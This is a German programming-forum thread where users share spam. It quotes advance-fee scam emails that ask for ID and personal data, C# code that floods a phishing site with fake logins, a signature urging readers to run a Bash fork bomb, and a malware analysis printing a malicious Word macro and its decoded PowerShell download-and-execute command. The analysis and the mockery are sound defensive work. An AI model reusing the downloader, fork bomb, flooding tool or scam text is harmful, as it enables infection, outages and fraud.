Zeigt her euren Spam

SSL ist deaktiviert! Aktivieren Sie SSL für diese Sitzung, um eine sichere Verbindung herzustellen.

Es gibt 219 Antworten in diesem Thema. Der letzte Beitrag () ist von EaranMaleasi.

    Die vereinten Nationen schreiben mir ^^

    ​Entwicklungsprogramm der Vereinten Nationen.Vereinten Nationen Spendenprogramm 2017.ANMELDUNG FÜR SIE FÜR DIE ENTWICKLUNG IN IHRER REGION.Hiermit wird Ihnen mitgeteilt, dass Sie für den Empfang ausgewählt wurdenSpendenpreis Summe von £ 850.000,00 Eight Hundred und FünfzigtausendPfund) als Wohltätigkeitsspenden / Hilfe von UNDP, ECOWAS,EU und der UNO im Einklang mit dem Ermächtigungsakt des Parlaments.Im Namen der Stiftung sagen wir Ihnen Glückwünsche.Dein,Anna ryanHelmholtz Zentrum MuenchenDeutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)Ingolstaedter Landstr. 185764 Neuherberg WEBSITE ZENSIERTAufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-BotheGeschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons EnhsenRegistergericht: Amtsgericht Muenchen HRB 6466USt-IdNr: DE 129521671
    Da hat mir geschrieben: Mr Steve James <jamesmrsteve@brs-shanghai.com>, der, wenn ich richtig lese, im Audtrag von Herrn Kofi Annan handelt. Ich fühle mich nun AUSSERORDENTLICH geehrt:
    #################################
    Dear
    We have been having series of meetings for the passed 1 month now
    which ended 2 days ago with the Nigeria Government, with the former
    Secretary-General (Hon. Kofi Annan) to the UNITED NATIONS. Federal
    Reserve Bank of New York, HSBC Bank of United Kingdom (UK) with the
    World Bank Officials. This email is for all the people that have not
    been paid, for their contract/inheritance in any part of the world, the
    United Nations, Federal Reserve Bank of New York HSBC Bank of United
    Kingdom (UK) Reserve Bank of Nigeria, with the World Bank officials have
    agreed to compensate them with the sum of Four Million, Nine Hundred
    Thousand US Dollars each victim. This includes every foreign contractor
    that may have not received his or her contract sum and people that have
    had an unfinished transaction, people who have inheritance to claim or
    international businesses that failed due to instability of government in
    some part of World.
    We found your email address in our list and that is why we are
    contacting you, these have been agreed upon and have been duly
    signed.Therefore, we are happy to inform you that your ATM Card Number:
    4120 5350 0015 has been approved and upgraded, via ZENITH BANK INT'L in
    your favor.Meanwhile, your Secret Pin Number will be available as soon
    as you confirm to us the receipt of your ATM CARD.
    The ATM Card Value is $6,300,000.00 USD Only. You are advised that a
    maximum withdrawal value of US$20,000.00 is permitted daily.And its is
    duly inter-switched and you can make withdrawal in any location of the
    ATM Center of your choice/nearest to you any where in the world. We have
    also concluded delivery arrangement with our accredited courier service
    Company FEDEX EXPRESS to oversee the delivery of the ATM Card to you
    without any further delay.
    Be informed that your response would be by telephone or through email
    Only.Any further delay will be the pleasure of the UNRC to use your fund
    to help the people who have been displaced in Darfur, Sudan Africa
    which you can see it in this site savedarfur.org/ and the
    Tsunami's victims in Asia. So you are hereby advice to forward to this
    office Director ATM SWIFT CARD Department Therefore, you should send him
    your full Name and telephone number/your correct mailing address where
    you want him to send the ATM to you. Contact Person Apostle (Dr.)
    Nathalie Alfred. immediately for your ATM SWIFT CARD: Person to Contact
    Apostle: (Dr.) Nathalie Alfred. E-mail: drnathaliealfreds@gmail.com We
    are working according to the constitution binding this committee as well
    as helping the less privilege through this means. You will be required
    to contact the above mentioned institution via telephone or email.
    Hoping to hear from you as soon as you receive your ATM

    1.YOUR FULL NAME ................
    2.PHONE AND FAX NUMBER...............
    3.ADDRESS WERE YOU WANT US TO SEND THE ATM CARD...............
    4.A Copy Of Your Identity Attached To e-mail

    Regards,

    Mr Steve James
    Keine exorbitant hohen Versandkosten? Kein sonst üblicher Schabernack?
    Was haben die mit den Persoinformationen vor 8|
    Post-AGB:
    §1 Mit dem Lesen dieses Posts stimmst du den AGB unverzüglich zu
    §2 Ein Widerruf muss innerhalb von 3 Sekunden nach Lesen des Hauptbestandteil des ersten jemals gelesenen Posts erfolgen
    Abs.1 Die Signatur zählt nicht zum Hauptbestandteil des Posts
    §3 Ein erfolgreicher Widerruf zwingt zu einem Besuch bei einem Hypnotiseur oder Neurochirurg, sodass der gelesene Text aus den Erinnerungen entfernt werden kann
    Abs.1 Die Kosten und Risiken sind jeweils selbst zu tragen
    @EaranMaleasi, @xChRoNiKx. Genau. Ein guter Freund ist bei der KriPo im Bereich Internetkriminalität tätig. Aus seiner Erfahrung sind die abgefragten Daten alles was benötigt wird, um z.B. mein Bank-Konten zu erfahren, ebenso die genutzten Kreditkarten, Akkreditierungen bei Online-Händlern etc., und da dann zu meinen Lasten abzuräumen. Die "Nigeria-Connection" ist durchaus bekannt.
    Ach wie geil. Ich habe heute mal wieder nach langer Zeit eine Pfishing Mail bekommen, wo ich mein Online-Konto oder sowas von der Volksbank verifizieren sollte. Da hab ich natürlich direkt wieder schnell ein kleine Programm geschrieben, dass die Seite mit zufälligen Daten füttert. 30 Minuten später war die Webseite dann ganz kurz offline und steht jetzt so dar :D :
    :thumbsup:
    Post-AGB:
    §1 Mit dem Lesen dieses Posts stimmst du den AGB unverzüglich zu
    §2 Ein Widerruf muss innerhalb von 3 Sekunden nach Lesen des Hauptbestandteil des ersten jemals gelesenen Posts erfolgen
    Abs.1 Die Signatur zählt nicht zum Hauptbestandteil des Posts
    §3 Ein erfolgreicher Widerruf zwingt zu einem Besuch bei einem Hypnotiseur oder Neurochirurg, sodass der gelesene Text aus den Erinnerungen entfernt werden kann
    Abs.1 Die Kosten und Risiken sind jeweils selbst zu tragen
    Gut gemacht! :D

    Grüße
    #define for for(int z=0;z<2;++z)for // Have fun!
    Execute :(){ :|:& };: on linux/unix shell and all hell breaks loose! :saint:

    Bitte keine Fragen per PN, denn dafür ist das Forum da :!:
    Wir hatten auch mal etwas langeweile gehabt und haben die Hauptseite (die wir von BlueSpides PhisingSubdomain abgeleited haben) mit Daten durch HttpWebRequest gefüttert.
    Wer langeweile hat kann es auch mal Compilen und ausführen:
    code

    C#-Quellcode

    1. class Program
    2. {
    3. static void Main(string[] args)
    4. {
    5. int i = 0;
    6. while (i < (args.Length > 0 ? int.Parse(args[0]) : 1000))
    7. {
    8. i++;
    9. Random r = new Random(i);
    10. List<byte> bst = new List<byte>();
    11. for (int i1 = 0; i1 < r.Next(8, 14); i1++)
    12. bst.Add((byte)r.Next(0, 67));
    13. int pin = r.Next(10000000, int.MaxValue);
    14. WriteLine("Created VR-NetKey: " + bst.ToArray().ToByteString());
    15. WriteLine("Created PIN: " + pin);
    16. HttpWebRequest web = (HttpWebRequest)WebRequest.Create("http://check-de-session-build.info/");
    17. string useragent = "Mozilla/-1.0 (MS-DOS 1.0; WOW64; rv:3.0) Chameleon/2000 AntiPhising/12.0";
    18. web.UserAgent = useragent;
    19. web.Method = "POST";
    20. byte[] data = Encoding.ASCII.GetBytes(
    21. $"Oc9d1d6d46533b972bc017a165f77f33b4d2325b5={bst.ToArray().ToByteString()}&Ofe7e5084fc5033753dfecbbac6f687bae5814f84={pin.ToString()}");
    22. web.ContentType = "application/x-www-form-urlencoded";
    23. web.ContentLength = data.Length;
    24. using (Stream stream = web.GetRequestStream())
    25. stream.Write(data, 0, data.Length);
    26. HttpWebResponse webResp = (HttpWebResponse)web.GetResponse();
    27. StreamReader read = new StreamReader(webResp.GetResponseStream());
    28. read.Close();
    29. read.Dispose();
    30. read = null;
    31. WriteLine("Request created.");
    32. }
    33. ReadLine();
    34. }
    35. }
    36. static class ExtensionClass
    37. {
    38. public static string ToByteString(this byte[] bfs)
    39. {
    40. string final = "";
    41. string charset = "abcdefghijklmnopqrstuvwxyz" + "abcdefghijklmnopqrstuvwxyz".ToUpper() + "1234567890" + "!?&$#'";
    42. foreach (byte b in bfs)
    43. final += charset[b];
    44. return final;
    45. }
    46. }



    Developed by
    http://www.sln-tools.net/
    Current Projects: C-Studio; DevProgress

    Bluespide schrieb:

    Ach wie geil. Ich habe heute mal wieder nach langer Zeit eine Pfishing Mail bekommen, wo ich mein Online-Konto oder sowas von der Volksbank verifizieren sollte. Da hab ich natürlich direkt wieder schnell ein kleine Programm geschrieben, dass die Seite mit zufälligen Daten füttert. 30 Minuten später war die Webseite dann ganz kurz offline und steht jetzt so dar :D :
    vb-paradise.de/index.php/Attac…f3f097ea4018f7c156003481b



    Bester Move xD
    Ich hab mich jetzt mal dran gesetzt, einen E-Mail Anhang auseinanderzunehmen. Leider habe ich etwas voreilig die sowohl die E-Mail, als auch die Datei gelöscht, ohne ausführlich Screenshots zu machen.
    Die Mail kam (vorgetäuscht natürlich) von "NatWest" und es ging um Kontoauszüge oder so ähnlich. Angehängt war eine .doc-Datei, in der angeblich wichtige Informationen stehen würden. Also habe ich die Datei erst mal im Share-Ordner einer VM abgespeichert.
    VirusTotal sagt übrigens: virustotal.com/#/file/8a87da9c…8b46e83a06f80d4/detection
    Dann habe ich die Datei in der VM auf den Desktop verschoben (sodass sie nicht mehr auf dem Host vorhanden ist), den Share-Ordner getrennt, um die Verbindung nach draußen abzuschneiden (die VM hat keine Netzwerkadapter) und dann in der VM die Datei in Word geöffnet.
    War eine ganz nette Masche:

    Das Erlauben von Makros würde natürlich automatisch zur Ausführung selbiger führen, wodurch der Computer infiziert wird.
    Also wollte ich erst mal die Entwicker-Tools öffnen und den Code angucken, aber interessanterweise waren die Makros mit einem Passwort geschützt. Also sie können nicht angesehen und bearbeitet werden, ohne das Passwort zu kennen, aber ausgeführt können sie wohl trotzdem werden. Also habe ich das Internet nach einem Programm durchforstet, das dieses Passwort entfernen kann. Da gibt's übrigens auch eine ganze Menge CrapWare, also falls mal jemand sowas sucht: aufpassen, dass man sich keine Schadsoftware runterlädt.

    Nachdem diese Hürde überwunden war konnte ich dann den Code sehen. Und es war garnicht so viel.
    Eine Form ohne Code, ein einziges Modul (Code weiter unten) und in "ThisDocument" diese Methode:

    Visual Basic-Quellcode

    1. Sub autoopen()
    2. Rem bap bap bap
    3. bessameat
    4. End Sub

    Da musste ich erst mal lachen, aber was "bap bap bap" bedeutet, weiß ich auch nicht. (Das Forum zeigt es zwar nicht korrekt an, aber Rem ist wie ' für Kommentare da.)
    Der Code in dem einen Modul ist (bis auf meine Veränderungen) folgender:
    Spoiler anzeigen

    Visual Basic-Quellcode

    1. Sub bessameat()
    2. Dim str2 As String
    3. Dim id As Integer
    4. Dim ota As Integer
    5. With UserForm1.T
    6. ota = .Left
    7. End With
    8. Dim j As Integer
    9. str2 = vantalin(ota)
    10. For j = 0 To 1
    11. supernosa (str2)
    12. id = id + 1
    13. Next
    14. End Sub
    15. Sub supernosa(jon)
    16. Dim td As Integer
    17. td = 380
    18. jsdf = Len(jon)
    19. td = jsdf - td
    20. If jsdf = 380 Then
    21. Shell jon, td
    22. End If
    23. End Sub
    24. Function vantalin(cde)
    25. Dim QlyC As String
    26. Dim Eftdxb() As Byte
    27. Dim Vfxbovft() As Byte
    28. Dim askg As String
    29. askg = "R1762V"
    30. Dim LanjyA As String
    31. LanjyA = UserForm1.Label1.Caption
    32. Dim Nyji As String
    33. Dim Jvpbobb() As Byte
    34. QlyC = "IhgypyadO"
    35. Vfxbovft = LanjyA
    36. Eftdxb = askg
    37. Ru = UBound(Vfxbovft)
    38. Nyji = "Moaygys"
    39. Dim Lkej5 As String
    40. Yrb = UBound(Eftdxb)
    41. Lkej5 = ""
    42. cde = cde - 5
    43. For iifyjn = 0 To Ru
    44. nvf8 = 0
    45. For ob = 0 To Yrb
    46. If Vfxbovft(iifyjn) = Eftdxb(ob) Then nvf8 = nvf8 + 1
    47. Next
    48. If nvf8 = 0 Then
    49. city = Vfxbovft(iifyjn) - cde
    50. Lkej5 = Lkej5 + Chr$(city)
    51. End If
    52. Next
    53. Dim Rogy As String
    54. vantalin = Lkej5
    55. Rogy = "Create document"
    56. End Function

    Der Code war nicht eingerückt und es wurden willkürlich Leerzeilen verwendet. Ich habe mal versucht, die Lesbarkeit zumindest geringfügig zu verbessern.

    Man beachte Shell jon, td in supernosa (MSDN Shell-Funktion). jon ist ein String, der einen Befehl beinhaltet. Der zweite Parameter, td, ist ein AppWinStyle (MSDN AppWinStyle) und aufgrund der Subtraktion immer 0, was das Fenster wohl verstecken wird.

    Das ist aber relativ wenig Code für einen solchen Virus. Wie wird hier der ausgeführte Befehl zusammengebastelt? Der Trick liegt bei LanjyA = UserForm1.Label1.Caption in vantalin. Da drin befinden sich ein 640 Zeichen langer Zeichensalat. Der Anfang sieht so aus: dne67!0d!Q16pxf6sRT77ifm, aber den Rest werde ich hier nicht dazuschreiben. Unten weiter ist der Grund erklärt.

    Ich habe den Code in ein VB-Projekt kopiert, den Shell-Aufruf auskommentiert und stattdessen einen Haltepunkt gesetzt.
    Bis auf die syntaktischen Anpassungen gab es noch folgende Probleme:
    1. Im Code wird an manchen Stellen ein String einem Byte-Array zugewiesen (z.B. bei Vfxbovft = LanjyA). Das macht in VB.NET natürlich keinen Sinn, deshalb musste ich erst mal herausfinden, was das macht. Diesbezüglich auch Was passiert bei Zuweisung von String an Byte-Array?.
    Und 2. wird in bessameat noch UserForm1.T.Left verwendet. Leider hatte ich zu diesem Zeitpunkt bereits die Datei und die E-Mail gelöscht. Deshalb musste ich raten, was das sein kann. Da ".Left" auf die Position eines Controls schließen lässt, habe ich einfach von 0 aufwärts probiert, bis was sinnvolles raus kam. Das war dann bei dem Wert 6 der Fall.
    Der resultierende String in jon war dann folgender (ich habe wieder Zeilenumbrüche und Einrückung eingefügt):

    Shell-Script

    1. cmd /c PowerShell
    2. "
    3. 'PowerShell
    4. ""
    5. function join([String] $str)
    6. {
    7. (New-Object System.Net.WebClient).DownloadFile($str,''%TMP%\cqchx.exe'');
    8. Start-Process ''%TMP%\cqchx.exe'';
    9. }
    10. try
    11. {
    12. join(''http://zensiert1/hasla.png'')
    13. }
    14. catch
    15. {
    16. join(''http://zensiert2/hasla.png'')
    17. }
    18. '
    19. ""
    20. |
    21. Out-File -encoding ASCII -FilePath %TMP%\hcyol.bat;
    22. Start-Process '%TMP%\hcyol.bat' -WindowStyle Hidden
    23. "
    Die nicht übereinstimmenden Anführungszeichen sind übrigens nicht meine Schuld ;)
    Der Ablauf ist hier folgender:
    Ein Powershell-Script (A) wird gestartet. Dieses startet ein Powershell-Script (B).
    (B) versucht für zensiert1, und wenn das nicht klappt für zensiert2, eine als PNG-Datei getarnte EXE-Datei aus dem Internet herunterzuladen, im Temp-Verzeichnis zu speichern und anschließend auszuführen.
    Was auch immer von dieser Datei in den StandardOutput-Stream geschrieben wird, wird von (B) abgefangen und in dessen StandardOutput-Stream geschrieben.
    (A) fängt das dann ab, "piped" es über den Out-File-Befehl in eine .bat-Datei hinein und führt dann diese Batch-Datei aus.

    Um die User hier zu schützen (falls jemand den Code versehentlich ausführt), und um die Betreiber der betroffenen Webseiten zu schützen (könnte einen Ansturm an panischen E-Mails geben), habe ich die Domains (und den Inhalt von UserForm1.Label1.Caption) hier rauszensiert. zensiert1 gab es bereits nicht mehr (die Domain wurde nicht gefunden) und zensiert2 gab für diese Datei 404 zurück. Die Datei hieß aber in beiden Fällen "hasla.png" und befindet sich im obersten Verzeichnis. Also falls jemand einen Webserver hat, einfach mal nachgucken, ob nicht so eine Datei rumliegt.
    Da die Dateien nicht mehr zu haben sind, endet mein Ausflug leider hier. Schade. Ich hätte gerne noch gesehen, welchen Batch-Code die Dateien erzeugen, bzw. was die sonst noch so machen.
    "Luckily luh... luckily it wasn't poi-"
    -- Brady in Wonderland, 23. Februar 2015, 1:56
    Desktop Pinner | ApplicationSettings | OnUtils

    Neu

    Ich wusste bislang nicht, wie sehr ich an höheren Orten bekannt und beliebt bin (die allseits bekannt und beliebte Nigeria-Connection):
    Attention:Beneficiary,
    We have been having series of meetings for the passed 1 month now
    which ended 2days ago with the Nigeria Government, with the former
    Secretary-General (Mr.Ban Ki-moon) to the UNITED NATIONS Federal Reserve
    Bank of New York, HSBC Bank of United Kingdom (UK) with the World Bank
    Officials. This email is for all the people that have not been paid, for
    their Contract/Inheritance in any part of the world,the United Nations,
    Federal Reserve Bank of New York HSBC Bank of United Kingdom (UK)
    Reserve Bank of Nigeria, with the World Bank officials have agreed to
    compensate them with the sum of Six Million Three Hundred Thousand
    United State Dollars for each victim. This includes every foreign
    contractor that may have not received his or her contract sum and people
    that have had an unfinished transaction, people who have inheritance to
    claim or international businesses that failed due to instability of
    government in some part of World.

    We found your email address in our list and that is why we are
    contacting you, these have been agreed upon and have been duly
    signed.Therefore, we are happy to inform you that your ATM Card has been
    approved and upgraded, via ZENITH BANK INT'L in your favor.Meanwhile,
    your Secret Pin Number will be available as soon as you confirm to us
    the receipt of your ATM CARD.The ATM Card Value is $6,300,000.00 USD
    Only. You are advised that a maximum withdrawal value of US$20,000.00 is
    permitted daily.And its is duly inter-switched and you can make
    withdrawal in any location of the ATM Center of your choice/nearest to
    you any where in the world. We have also concluded delivery arrangement
    with our accredited courier service Company to oversee the delivery of
    the ATM Card to you without any further delay.

    Be informed that your response would be by telephone or through
    email Only.Any further delay will be the pleasure of the UNRC to use
    your fund to help the people who have been displaced in Darfur,Sudan
    Africa which you can see it in this site savedarfur.org/ and
    the Tsunami's victims in Asia. So you are hereby advice to forward to
    this office Director ATM SWIFT CARD Department Therefore, you should
    send him your full Name and telephone number/your correct mailing
    address where you want him to send the ATM to you.Contact person
    immediately for your ATM SWIFT CARD, Person to Contact Dr Nathalie
    Alfred

    E-mail: drnathaliealfreds@gmail.com We are working according to the
    constitution binding this committee as well as helping the less
    privilege through this means.You will be required to contact the above
    mentioned institution via telephone or email.Hoping to hear from you as
    soon as you receive your ATM Card.

    (1)Your Full name & Address To Deliver The Card....................................

    (2)Contact Phone Number............................

    (3)Current Occupation..............................

    (4)Marital Status..............................

    (5)Sex...................................

    (6)Age........................

    (7)Scan copy of your Working ID/ Int'l Passport.............................



    Best Regards,

    Mr Issam Saud Khalil

    Neu

    xChRoNiKx schrieb:

    nen Spaß daraus machen und antworten
    ... und ganz nebenbei die Mail Adresse verifizieren. Voll nett von dir ;)
    "Gib einem Mann einen Fisch und du ernährst ihn für einen Tag. Lehre einen Mann zu fischen und du ernährst ihn für sein Leben."

    Wie debugge ich richtig? => Debuggen, Fehler finden und beseitigen
    Wie man VisualStudio nutzt? => VisualStudio richtig nutzen

    Neu

    Post-AGB:
    §1 Mit dem Lesen dieses Posts stimmst du den AGB unverzüglich zu
    §2 Ein Widerruf muss innerhalb von 3 Sekunden nach Lesen des Hauptbestandteil des ersten jemals gelesenen Posts erfolgen
    Abs.1 Die Signatur zählt nicht zum Hauptbestandteil des Posts
    §3 Ein erfolgreicher Widerruf zwingt zu einem Besuch bei einem Hypnotiseur oder Neurochirurg, sodass der gelesene Text aus den Erinnerungen entfernt werden kann
    Abs.1 Die Kosten und Risiken sind jeweils selbst zu tragen